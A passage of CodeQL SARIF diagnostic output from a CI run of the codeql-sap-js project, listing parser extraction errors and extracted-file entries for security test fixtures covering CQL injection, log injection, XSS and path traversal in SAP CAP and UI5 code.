token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/basic-authentication/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds","uriBaseId":"%SRCROOT%","index":166},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds","uriBaseId":"%SRCROOT%","index":168},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds","uriBaseId":"%SRCROOT%","index":171},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/dummy-authentication/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds","uriBaseId":"%SRCROOT%","index":173},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds","uriBaseId":"%SRCROOT%","index":177},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds","uriBaseId":"%SRCROOT%","index":178},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.cds","uriBaseId":"%SRCROOT%","index":184},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/cqlinjection/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/srv/service2.cds","uriBaseId":"%SRCROOT%","index":185},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/cqlinjection/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/cqlinjection/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds","uriBaseId":"%SRCROOT%","index":187},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/cqlinjection/db/schema.cds","uriBaseId":"%SRCROOT%","index":189},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/cqlinjection/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/cqlinjection/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds","uriBaseId":"%SRCROOT%","index":192},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds","uriBaseId":"%SRCROOT%","index":194},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-not-depending-on-request/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/db/schema.cds","uriBaseId":"%SRCROOT%","index":195},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/srv/service.cds","uriBaseId":"%SRCROOT%","index":199},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/srv/service.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/srv/service.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":202},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":206},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":207},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-complete-protocol-none/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":210},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":214},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":215},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":219},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":221},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":225},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service2-protocol-none/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds","uriBaseId":"%SRCROOT%","index":226},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/db/schema.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds","uriBaseId":"%SRCROOT%","index":231},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds","uriBaseId":"%SRCROOT%","index":233},"region":{"startLine":1,"endColumn":2}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds with error Error: Unexpected token"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service2.cds with error Error: Unexpected token"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure.cds","uriBaseId":"%SRCROOT%","index":237},"region":{"startLine":1,"startColumn":2,"endColumn":3}}}],"message":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure.cds with error Error: Expected u found a"},"level":"error","descriptor":{"id":"js/diagnostics/extraction-errors","index":1,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":"Extraction failed in /home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure.cds with error Error: Expected u found a"}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/Component.js","uriBaseId":"%SRCROOT%","index":400}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":277}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js","uriBaseId":"%SRCROOT%","index":110}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/sensitive-exposure/sensitive-exposure.js","uriBaseId":"%SRCROOT%","index":238}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5FormulaInjection/formula-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":288}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-type-sanitized/server.js","uriBaseId":"%SRCROOT%","index":200}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/SearchJourney.js","uriBaseId":"%SRCROOT%","index":408}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/path-traversal/pathinjection.js","uriBaseId":"%SRCROOT%","index":234}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js","uriBaseId":"%SRCROOT%","index":2}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/misused-privileged-user/unnecessarily-granted-privileged-access-rights/server.js","uriBaseId":"%SRCROOT%","index":151}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-without-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":230}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/server.js","uriBaseId":"%SRCROOT%","index":176}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/index.js","uriBaseId":"%SRCROOT%","index":496}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js","uriBaseId":"%SRCROOT%","index":571}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/LogEntriesToHttp.js","uriBaseId":"%SRCROOT%","index":360}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api1/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":424}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-sinks/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":359}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-book-example/webapp/test/integration/FilterJourney.js","uriBaseId":"%SRCROOT%","index":407}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-xml-fragment/webapp/index.js","uriBaseId":"%SRCROOT%","index":608}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"extractors/cds/tools/esbuild.config.mjs","uriBaseId":"%SRCROOT%","index":32}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-jquery/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":444}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/loginjection/log-injection-with-service1-protocol-none/srv/service1.js","uriBaseId":"%SRCROOT%","index":216}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/cap/test/queries/bad-authn-authz/nonprod-authn-strategy/mocked-authentication/srv/service2.js","uriBaseId":"%SRCROOT%","index":180}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5PathInjection/path-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":386}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-api2/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":435}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":461}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5LogInjection/log-entry-flows-to-http-log-listener-sap-module/webapp/utils/CustomLogListener.js","uriBaseId":"%SRCROOT%","index":333}}}],"message":{"text":""},"level":"none","descriptor":{"id":"cli/expected-extracted-files/javascript","index":0},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"jav